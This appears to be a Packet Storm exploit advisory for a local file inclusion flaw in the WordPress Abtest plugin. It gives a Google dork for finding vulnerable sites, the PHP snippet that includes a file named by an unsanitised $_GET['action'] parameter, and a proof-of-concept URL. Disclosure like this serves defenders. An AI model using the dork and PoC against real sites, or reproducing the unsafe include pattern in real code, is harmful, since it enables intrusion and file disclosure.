WordPress Abtest plugin suffers from a local file inclusion vulnerability.
4dfd25d83af233008ae8fd8f81633e2601547ac29e44fd477dde61fa603cb041# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File : abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics : http://i.imgur.com/jZFKYOc.png
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed